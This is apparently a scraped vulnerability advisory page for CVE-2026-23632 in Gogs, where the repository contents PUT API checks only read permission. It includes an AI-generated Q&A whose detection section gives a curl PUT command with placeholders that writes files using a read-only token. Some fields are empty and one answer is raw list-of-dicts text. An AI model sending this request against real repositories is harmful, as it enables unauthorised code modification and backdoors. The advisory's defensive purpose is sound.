CVE-2026-23632
Unauthorized Write Access in Gogs Repository via Insufficient Permission Check
Publication date: 2026-02-06
Last updated on: 2026-02-17
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| gogs | gogs | to 0.13.4 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-863 | The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. |
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-23632 is a vulnerability in the Gogs Git repository management system affecting versions up to 0.13.3. The issue is that the API endpoint PUT /repos/:owner/:repo/contents/* allows modification of repository contents without requiring write permissions. Instead, it only checks for read permissions via the repoAssignment() function. After this check, the system calls PutContents(), which triggers UpdateRepoFile(), resulting in a commit creation and a git push operation. This means an attacker with a token that has only read access can modify files in the repository.
The attack requires possession of a valid access token with read permission on the target repository, which could be a public repository or one where the attacker is a collaborator with read access. The attacker can send a PUT request to update arbitrary files, leading to unauthorized commits and pushes.
How can this vulnerability impact me? :
This vulnerability can have significant impacts including unauthorized modification of source code, injection of backdoors, and compromise of release artifacts or distributed packages. Because an attacker with only read permissions can push changes, the integrity of the repository is at high risk.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by checking if your Gogs instance is running a vulnerable version (0.13.3 or earlier) and by testing whether the API endpoint PUT /repos/:owner/:repo/contents/* allows modification of repository contents using a token with read-only permissions.'}, {'type': 'paragraph', 'content': 'One way to detect this is to attempt a PUT request to the endpoint with a read-only token and observe if the repository content is modified or a commit is created.'}, {'type': 'paragraph', 'content': 'Example command using curl to test the vulnerability (replace placeholders accordingly):'}, {'type': 'list_item', 'content': 'curl -X PUT -H "Authorization: token <read-only-token>" -d \'{"content":"<base64-encoded-content>", "message":"test commit"}\' https://<gogs-instance>/api/v1/repos/<owner>/<repo>/contents/<file-path>'}, {'type': 'paragraph', 'content': 'If the request succeeds in modifying the repository content or creating a commit, the system is vulnerable.'}] [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade your Gogs installation to version 0.13.4 or later, where this vulnerability has been patched.
Additionally, review and restrict the permissions of access tokens to ensure that tokens with read-only permissions cannot be used to modify repository contents.
If upgrading immediately is not possible, consider restricting network access to the vulnerable API endpoint or disabling the affected functionality temporarily.